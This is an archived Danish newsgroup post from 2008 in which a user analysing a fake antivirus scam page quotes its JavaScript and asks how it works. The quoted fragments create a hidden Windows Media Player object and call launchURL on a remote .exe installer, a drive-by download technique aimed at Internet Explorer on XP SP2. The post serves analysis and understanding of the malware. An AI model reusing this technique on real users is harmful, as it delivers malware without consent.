/ Forside / Teknologi / Internet / Sikkerhed / Nyhedsindlæg
Login
Glemt dit kodeord?
Brugernavn

Kodeord


Reklame
Top 10 brugere
Sikkerhed
#NavnPoint
stl_s 37026
arlet 26827
miritdk 20260
o.v.n. 12167
als 8951
refi 8694
tedd 8272
BjarneD 7338
Klaudi 7257
10  molokyle 6481
Et hurtigt spørgsmål om Mediaplayer, Javas~
Fra : Stig Johansen


Dato : 05-04-08 09:23

XPOST:
dk.edb.internet.webdesign.clientside,dk.edb.sikkerhed,dk.edb.sikkerhed.virus
FUT: dk.edb.sikkerhed

Hej grupper.

I forbuindelse med at jeg er ved at fabrikere et playback af en fake
virusscanner
<http://w-o-p-r.dk/xoomer/scanner.playback/xoomer.scanner.asp>
Er jeg stødt på følgende javascript:
fra
<http://w-o-p-r.dk/xoomer/scanner.playback/malware.javascript.part.1.html>

<udsnit>
var u = "6BF52A52-394A-11D3-B153-00C04F79FAA6" // <-- FYI GUID til
Mediaplayer.
document.write("<object id=iie width=0 height=0 classid='CLSID:"+u.. osv
</udsnit>
Her skabes en instans af mediaplayer med 0x0 px
Lidt længere nede:
<udsnit>
if (is_IE) {
if (is_XP_SP2) {
try {
iie.launchURL("http://xscanner.maXXXlarms.com/a/Install3400.exe"); }
</udsnit>

Tilsyneladende laver man en launchURL til Mediaplayeren med en _.exe_ fil.

Jeg har ikke selv XP, og jeg har forsøgt at søge mig ihjel på Google efter
"launchURL".

Men det eneste jeg får er hjemmefabrikerede Javascript funktioner.

Mine spørgsmål er så:
1) Er .launchURL en metode på mediaplayer objektet, eller er det en
'programmeringsfejl'?
2) Vil mediaplayer _afvikle_ en _.exe_ fil?
3) Hvis ja, er det en fejl eller en M$ 'feature' i mediaplayer?

--
Med venlig hilsen
Stig Johansen

 
 
Søg
Reklame
Statistik
Spørgsmål : 177558
Tips : 31968
Nyheder : 719565
Indlæg : 6408928
Brugere : 218888

Månedens bedste
Årets bedste
Sidste års bedste